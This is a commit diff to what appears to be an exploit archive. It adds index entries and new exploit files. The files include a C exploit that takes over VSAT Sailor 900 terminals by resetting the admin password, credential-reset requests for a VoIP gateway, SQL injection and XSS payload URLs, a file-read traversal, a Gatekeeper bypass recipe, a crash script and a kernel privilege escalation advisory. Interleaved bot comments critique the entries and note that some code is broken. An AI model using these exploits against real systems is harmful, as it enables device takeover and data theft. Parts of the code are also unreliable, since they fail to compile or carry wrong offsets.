Update: 2015-01-30

12 new exploits
Offensive Security 2015-01-30 08:36:43 +00:00
parent e216d45120
commit 6ca0dbbc0e
13 changed files with 883 additions and 0 deletions


@ -32365,3 +32365,15 @@ id,file,description,date,author,platform,type,port
35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include Vulnerability",2011-07-05,FL0RiX,php,webapps,0
35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0
35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0
35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0
35926,platforms/asp/webapps/35926.txt,"eTAWASOL 'id' Parameter SQL Injection Vulnerability",2011-07-03,Bl4ck.Viper,asp,webapps,0
35927,platforms/php/webapps/35927.txt,"Classified Script c-BrowseClassified URL Cross Site Scripting Vulnerability",2011-07-05,"Raghavendra Karthik D",php,webapps,0
35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 ActiveX SaveToFile() Arbitrary File Overwrite Vulnerability",2011-07-06,"High-Tech Bridge SA",windows,remote,0
35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection Vulnerability",2011-07-08,CoBRa_21,php,webapps,0
35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross Site Scripting Vulnerability",2011-07-11,Zerial,php,webapps,0
35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection Vulnerability",2011-07-11,kaMtiEz,php,webapps,0
35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias.",hardware,remote,0
35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0
35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass Vulnerability",2015-01-29,"Amplia Security Research",osx,local,0
35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0
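Review bot: the title of entry 35931 puts the version number inside the parameter quotes ("ICMusic '1.2 music_id' Parameter"); the advisory body says ICMusic 1.2 is affected and the parameter is music_id, so the row should read "ICMusic 1.2 'music_id' Parameter SQL Injection Vulnerability". Two smaller consistency points in the same rows: 35933 is filed under platform "hardware" although ManageEngine Firewall Analyzer is a web application (its own advisory calls it "log analytics and configuration management software"), and its date 2015-01-29 disagrees with the 2015-01-28 in that advisory's header.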



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48561/info
eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/npages/back.asp?id=[SQL]
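Review bot: the only exploit line is a placeholder, "back.asp?id=[SQL]", with no affected version and no payload, so the entry cannot be verified as written. Give at least a boolean pair (id=1 and 1=1 versus id=1 and 1=2) or the error the injection produces, so a reader can confirm the parameter is really interpolated into the query.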


@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/48560/info
The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request.
POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit
POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
submit=Save
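Review bot: the two requests never say what they achieve or what precondition they need, which is the whole point of the entry: the first POST sets the admin credentials (Nuser/Npass/Nrpass) and the second commits them, but the prose only says "bypass certain security restrictions". State whether change.cgi and save.cgi accept these POSTs without an authenticated session; neither request carries a Cookie or Authorization header, so that is presumably the claim, and it should be explicit. Two consistency nits: the second request line lacks the HTTP version ("POST http://<device address>/save.cgi" versus "... HTTP/1.1" on the first), and both Referer headers keep a literal 192.168.0.100 where everything else is templated as <device address>. The Content-Length values (50 and 11) do match the bodies.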

platforms/hardware/remote/35932.c Executable file

@ -0,0 +1,255 @@
/*
** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day]
** Author : Nicholas Lemonias
**
** This is proprietary source code material of Advanced Information Security Corporation.
** Usage, distribution and modifications are pursuant to our terms of agreement.
**
**
** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the
** author of this software.
** All rights reserved.
**
**
** This research demo is for academic research purposes ONLY. You may only use this software for
** educational purposes, or for the purpose of academic research.
** This work is copyright protected. You may not, copy, or distribute
** or use this in any other way, without prior authorisation. This work is covered by DMCA and
** other applicable intellectual property laws.
**
** #@#@~ VSAT SAILOR 900 / SATCOM (iDirect/Linux)
**
** Poc Tested on our: iDirect Infiniti VMU/SATCOM v.1.47 Build 9
** Platform Frequency: Ku/Ka band
** Compatible Networks: Jabiru, Inmarsat GX, and Intelsat's Epic
**
*/
/****************************************************************************************
(c) 2014 Advanced Information Security Corporation
*****************************************************************************************/
/*
** Compilation: cc satcompwn.c -o satcompwn
** HOW-TO:
**
** Usage: ./satcompwn <host> <port>\n
**
**
*/
#include <netinet/in.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <assert.h>
#include <errno.h>
#include <time.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#define BUFFER_MAX_SIZE 65535
#define BUFFER_MIN_LEN 230
ssize_t payload(int sock, char *hst, char *pg, char *pss)
{
char BUF_SIZE_S[BUFFER_MAX_SIZE + 1], BUF_SIZE_R[BUFFER_MAX_SIZE + 1];
ssize_t n; char *l;
snprintf(BUF_SIZE_S, BUFFER_MIN_LEN,
"POST %s HTTP/1.0\n\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Content-length: %zu \r\n"
"Cookie: tt_adm=694020\r\n"
"%s \r\n\n", pg, hst, strlen(pss), pss);
if(write(sock,BUF_SIZE_S, strlen(BUF_SIZE_S)) == -1) {
error("Read error");
return -1;
}
printf("\n");
printf("Sending Payload.....\n");
printf("\n\n");
printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S));
while ((n =read(sock,BUF_SIZE_R,sizeof(BUF_SIZE_R))) > 0){
BUF_SIZE_R[n] = '\0';
if(n == -1) {
error("Read error");
return -1;
}
if ( strstr(BUF_SIZE_R, "404")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.5 - False Positive HTTP ERROR [404] Host is not a V-SAT Sailor 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "401")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access to remote host.\n\n\n");
if ( strstr(BUF_SIZE_R, "500")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - The remote host couldn't recognise the request. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "303")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The code received says it is temporary under a different URL. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "307")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource received indicates redirection. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "403")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.4 - HTTP Forbidden [403] The remote server/ understood the request, but is refusing to fulfill it.\n\n\n");
if ( strstr(BUF_SIZE_R, "407")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - The remote terminal requires HTTP authentication. If this is a valid SAILOR 900 terminal, it is protected with HTTP authentication.\n\n\n");
if ( strstr(BUF_SIZE_R, "408")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait.\n\n\n");
if ( strstr(BUF_SIZE_R, "503")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Connection Refused. The hostname of the terminal provided is currently unable to handle the request.\n\n\n");
if ( strstr(BUF_SIZE_R, "411")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 411 - Length Required. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "400")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 400 - Bad Request. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
if ( strstr(BUF_SIZE_R, "301")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 301 - Moved Permanently. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
if ( strstr(BUF_SIZE_R, "BAD REQUEST")) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "202")) {
while ( (l=strstr(BUF_SIZE_R,"Thrane & Thrane")) == NULL ) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal...\n\n\n"); }
else if (strstr(BUF_SIZE_R, "Thrane & Thrane") != NULL && strstr(BUF_SIZE_R, "302") == NULL){
printf("[x] Mission Successful Ref. RFC 2616, 10.2.3 - HTTP Okay [202] The remote host is a V-SAT Sailor 900. Please Login as administrator: user:admin & pass:aisatpwn2134 on %s\n\n\n", hst);
}
}
printf("***********************************************************************\n");
printf("*Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
printf("***********************************************************************\n");
printf("* Please wait.. I will provide you with some more information below:\n");
printf("***********************************************************************\n");
printf("\n\n\n\n");
printf("%s \n\n", BUF_SIZE_R, sizeof(BUF_SIZE_R));
return n;
}
int main (int argc, char *argv[]) {
char *pg = "/index.lua?pageID=administration";
char *pss = "&usernameAdmChange=admin"
"&passwordAdmChange=aisatpwn2134";
// char *cval = "tt_adm=tt_adm=694020";
long arg;
int sock, opt, evalopt, s;
if(argc < 2)
{
printf("***********************************************************************\n");
printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
printf("***********************************************************************\n");
printf("* *\n");
printf("* (V-SAT SAILOR 900 Remote Exploit) *\n");
printf("***********************************************************************\n");
printf("* Disclaimer: This is proprietary source code material of Advanced *\n");
printf("* Information Security Corporation. This software is for *\n");
printf("* research purposes only. *\n");
printf("***********************************************************************\n");
printf("* VSAT Sailor 900 / Tested on iDirect Infiniti VMU v.1.47 Build 9 *\n");
printf("* Description: *\n");
printf("* The Sailor 900 VSAT is an advanced maritime stabilised Ku/Ka band *\n");
printf("* platform with integrated GPS, compatible with a number of satellite *\n");
printf("* networks, such as Jabiru, Inmarsat GX, and Intelsat's Epic. *\n");
printf("***********************************************************************\n");
printf("\n\n");
fprintf(stderr, " Main Menu \n");
fprintf(stderr, " Usage: %s <host> <port>\n", argv[0]);
exit(1);
}
struct timeval tv;
struct sockaddr_in remote;
struct hostent *host;
socklen_t lon;
host = gethostbyname((void *)argv[1]);
fd_set wset;
fd_set rset;
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
remote.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
remote.sin_family = AF_INET;
memset(remote.sin_zero,0,sizeof(remote.sin_zero));
fflush(stdout);
if (sock == -1) {
perror("socket creation error");
return -1;
}
FD_ZERO( &wset );
FD_SET( sock , &wset );
FD_ZERO( &rset );
FD_SET( sock , &rset );
tv.tv_sec = 3;
tv.tv_usec = 0;
s = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
if (s == -1 ) {
perror("connection ");
return -1;}
if( errno != 0) {
perror("connection ");
return -1;
}
arg = fcntl(sock, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sock, F_SETFL, arg);
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
perror("fcntl error");
return -1;
}
opt = select(sock+1,NULL,&wset,NULL,&tv);
if( opt == -1 ) {
perror("select");
return -1;
}
if (opt > 0) {
lon = sizeof(int);
getsockopt(sock, SOL_SOCKET, SO_ERROR, (void*)(&evalopt), &lon);
if (evalopt) {
fprintf(stderr, "Socket Connection Error Code at: %d - %s\n", evalopt, strerror(evalopt));
exit(0);
}
if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
perror("fcntl");
printf("[RST-FCNTL] FCNTL Error. Exiting the software.\n\n");
return -1;
}
if( payload(sock,host->h_name,pg,pss) != 1) printf("\n\n[x] Payload Sent. Please check server responses above to verify status.\n\n");
arg = fcntl(sock, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sock, F_SETFL, arg);
close(sock);
exit(1);
}
}
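Review bot: the request is malformed and the tool does not compile as shipped. The format string "POST %s HTTP/1.0\n\n" ends the header block with a blank line right after the request line, so Host, Content-type, Content-length, the Cookie and the form body are all sent after the end of headers; it should be "POST %s HTTP/1.0\r\n" with a single "\r\n\r\n" between the last header and the body. In payload(), error("Read error") is called with no declaration (and glibc's error() takes status, errnum and a format), printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S)) passes an extra argument, the "n == -1" test sits inside "while (n > 0)" and is dead, and the inner "while ((l = strstr(...)) == NULL) printf(...)" on a 202 response never terminates. In main(), "argc < 2" does not protect the argv[2] dereference, and snprintf is capped at BUFFER_MIN_LEN (230) bytes, which silently truncates the request once the hostname is more than a few characters long. The status checks strstr(BUF_SIZE_R, "404") and friends match the digits anywhere in the response, and the success message calls 202 "HTTP Okay" (RFC 2616 10.2.3 is 202 Accepted; 200 OK is 10.2.1). Finally, the PoC is destructive: it overwrites the terminal's admin password with aisatpwn2134, and nothing in the file explains why the fixed cookie tt_adm=694020 should be honoured by the terminal, which is the actual vulnerability claim and belongs in the header comment.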


@ -0,0 +1,52 @@
################################################################################################
# #
# ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-28
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/firewall/
# Demo Link: http://demo.fwanalyzer.com/
#Affected version: <= Build Version : 8.0
About ManageEngine Firewall Analyzer (From Vendor Site) :
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
that helps network administrators to centrally collect, archive, analyze
their security device logs and generate forensic reports out of it.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
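Review bot: the three "Diretory Traversal" (sic) URLs are really a file read through the "url" parameter of mindex.do and index2.do, and the trailing %3f (a literal "?") that makes the server ignore whatever suffix it appends to the path is not explained. Name the parameter, say why the "?" is needed, and show a payload that leaves the webapp root (a "../" sequence), because reading ./WEB-INF/web.xml only demonstrates access to a protected directory, not traversal. The XSS line injects into an attribute (the value importedLogDetails" onmouseover=prompt(902321) bad="), again through "url", so the page it is reflected into should be stated as well. The header date 2015-01-28 also disagrees with the 2015-01-29 recorded for this entry in files.csv.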

platforms/osx/local/35934.txt Executable file

@ -0,0 +1,112 @@
# Exploit Title: OS X Gatekeeper bypass Vulnerability
# Date: 01-27-2015
# Exploit Author: Amplia Security Research
# Vendor Homepage: www.apple.com
# Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# CVE : CVE-2014-8826
Advisory URL :
http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html
Gatekeeper is a feature available in OS X Lion v10.7.5 and later
versions of OS X.
Gatekeeper performs checks on files and applications downloaded from the
Internet to prevent execution of supposedly malicious and
untrusted/unsigned code.
Gatekeeper provides three different settings:
- Mac App Store (Only apps that came from the Mac App Store can open)
- Mac App Store and identified developers (Only apps that came from the
Mac App Store and identified developers using Gatekeeper can open)
- Anywhere
The default setting is "Mac App Store and identified developers".
This setting prevents execution of any code that was not downloaded from
the Mac App Store and that was not digitally signed by a Developer ID
registered with Apple.
For example, If the user downloads an application from an untrusted
source and double-clicks on the application to execute it, OS X
Gatekeeper will prevent its execution with the following warning message:
"<AppName> can't be opened because it is from an unidentified developer."
(For more information on OS X Gatekeeper, see
http://support.apple.com/kb/ht5290)
We found an attacker can bypass OS X Gatekeeper protections and execute
unsigned malicious code downloaded by the user, even if OS X Gatekeeper
is configured to only allow execution of applications downloaded from
the Mac App Store (the highest security setting).
The exploitation technique is trivial and requires Java to be installed
on the victim's machine.
OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and
class (.class) files, but this verification can be bypassed.
For example:
- Create a JAR file containing the code to be executed
For example,
File AmpliaTest.java:
public class AmpliaTest {
public static void main(String[] args) {
try { Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
} catch(Exception e) { }
}
}
(This is just an example, of course, arbitrary code can be executed)
$ javac AmpliaTest.java
Be sure to compile the code for a version of Java lower than or equal to
the one available on the target (for example, javac -target 1.6 -source
1.6 AmpliaTest.java; and the compiled code will work on Java versions >=
1.6) .
$ echo "main-class: AmpliaTest" > Manifest
$ jar cmf Manifest UnsignedCode.jar AmpliaTest.class
- Create a .DMG disk image
For example:
$ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg
- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-Click on 'UnsignedCode' and the code will be executed bypassing
OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).
(Perform the same steps but without removing the .jar extension to
UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file)
Because the file 'UnsignedCode' has no extension, Finder will display a
blank page icon; the Java/JAR icon will not be displayed. The user does
not know he is double-clicking on a JAR file and the file does not look
particularly suspicious. Also, since the unsigned code is distributed
inside a disk image (.DMG) file, there are many things the attacker can
do to gain the trust of the user (include other files, use Finder
background images, etc).
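Review bot: the steps never say why the extensionless copy escapes the check, and the "Tested on" line lists OS versions but not the Gatekeeper setting used, although the text claims the bypass holds at the "Mac App Store" (highest) setting; add the setting, and which Java runtime was installed, to the header. For repeatability, the step "Download AmpliaTest.dmg using Safari and open it" should include the check a reader can run on the mounted volume (xattr -l on UnsignedCode) to confirm com.apple.quarantine is present, so the result is a real Gatekeeper bypass rather than a file that was never quarantined. The build commands themselves ("echo "main-class: AmpliaTest" > Manifest", "jar cmf Manifest UnsignedCode.jar AmpliaTest.class") are consistent with the javac -target/-source note.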


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48564/info
Classified Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/
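Review bot: the PoC can only be decoded by hand: q:%5C%22%3E is \"> , so the reflected value is the "q" search term inside the path-style parameter string, and the trailing |p:0|gal:0|typ:|/ segments are the other fields. State that the vulnerable field is "q" and that the injection closes a double-quoted attribute, and use a neutral payload; the marquee text credits r007k17 while files.csv attributes the entry to Raghavendra Karthik D.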


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48621/info
The 'com_voj' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1
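Review bot: "id=215 and 1=1" on its own demonstrates nothing, since a true condition returns the same page as the unmodified request; pair it with "and 1=2" (or show the differing response) so the entry is testable, and remove the stray space in "http://www.example.com/ [PATH]/index.php".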

platforms/php/webapps/35930.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/48637/info
Prontus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/prontus_fonasa/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/prontus_senado/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/p1_rector/antialone.html?page=javascript:alert%28/XSS/%29;//
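Review bot: page=javascript:alert(/XSS/);// only fires if the "page" value is written into a URL context (an href or a client-side redirect), not into "dynamically generated content" in general; say where antialone.html reflects it, because a javascript: URI in a text or ordinary attribute-value context is inert. The three paths (prontus_fonasa, prontus_senado, p1_rector) are installation-specific; a single generic antialone.html?page= line with a note that the prefix varies per site would avoid pointing at particular deployments.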


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48639/info
ICMusic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ICMusic 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6--
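Review bot: the UNION payload is MySQL-specific (@@version) and ends in a bare "--"; MySQL only treats "--" as a comment when it is followed by whitespace, so unless the application happens to append a space the tail of the original query is not commented out. Use "--+" or "-- -" in the URL. The six-column count (1,@@version,3,4,5,6) is asserted rather than derived; the "order by" probe or the error that established it would let a reader reproduce the result.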


@ -0,0 +1,46 @@
# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC
# Google Dork: [none]
# Date: 01/28/2015
# Exploit Author: bonze
# Email: dungvtr@gmail.com
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download)
# Version: 1.1
# Tested on: Windows 7 SP1 EN
# CVE : [none]
# Note:
# Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking
# Please tell me if you have any ideal
#013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.)
#013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; |
#013E801E |. 51 PUSH ECX ; |WideCharBuf
#013E801F |. 52 PUSH EDX ; |StringSize
#013E8020 |. 50 PUSH EAX ; |StringToMap
#013E8021 |. 6A 00 PUSH 0 ; |Options
#013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP
#013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar
#013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208]
# At Offset: 327-> overwrite nSEH
# At Offset: 329-> overwrite SEH
# badchar = 0x22
buff2 = "A" * 325
buff2+= "CC" # nSEH
buff2+= "BB" # SEH
crash2 = "<config>\n"
crash2 += " <current Dat=\"1422420474\" />\n"
crash2 += " <Dat Txt=\""+buff2+"\" />\n"
crash2 += "</config>\n"
# Copy file update.xml to UniPDF Application Folder and run UniPDF.exe
file = open("update.xml","w")
file.write(crash2)
file.close()
print "UniPDF v1.1 Crash PoC by bonze at FPT-IS"
print "Email: dungvtr@gmail.com"
print "File Created"
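Review bot: the offsets in the comments do not match the buffer. "A" * 325 followed by "CC" and "BB" places nSEH at offset 325 and SEH at 327, while the comments say 327 and 329; either the padding should be 327 bytes or the comment values are wrong, and as written a reader cannot place a real handler address. The "badchar = 0x22" line is simply the double quote that closes the Txt attribute in update.xml, which is worth saying so nobody hunts for a second reason. The script is Python 2 (print statements), which the header should state.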

platforms/windows/local/35936.py Executable file

@ -0,0 +1,302 @@
"""
KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-001
Publication Date: 2015.01.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: TCP/IP Protocol Driver
Affected Version: 5.2.3790.4573
Platform: Microsoft Windows Server 2003 Service Pack 2
Architecture: x86, x64, Itanium
Impact: Privilege Escalation
Attack vector: IOCTL
CVE-ID: CVE-2014-4076
2. Vulnerability Description
The tcpip.sys driver fails to sufficiently validate memory
objects used during the processing of a user-provided IOCTL.
3. Technical Description
By crafting an input buffer that will be passed to the Tcp
device through the NtDeviceIoControlFile() function, it
is possible to trigger a vulnerability that would allow an
attacker to elevate privileges.
This vulnerability was discovered while fuzzing the tcpip.sys
driver. A collection of IOCTLs that could be targeted was
obtained and subsequently fuzzed. During this process, one of
the crashes obtained originated from the IOCTL 0x00120028.
This was performed on an x86 installation of Windows Server
2003, Service Pack 2.
ErrCode = 00000000
eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=????????
A second chance exception has occurred during a mov
instruction. This instruction is attempting to copy a pointer
value from an un-allocated address space. Since no pointer
can be found, an exception is generated.
Let's begin by reviewing the call stack:
kd> kv
*** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr Args to Child
f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo])
f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo])
f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo])
f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo])
f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo])
f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo])
f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo])
f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo])
f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo])
The nt!NtDeviceIoControlFile() function was called, creating
a chain of subsequent function calls that eventually led to
the tcpip!SetAddrOptions() function being called.
By de-constructing the call to nt!NtDeviceIoControlFile() we
can derive all required information to re-create this exception.
0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a
eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
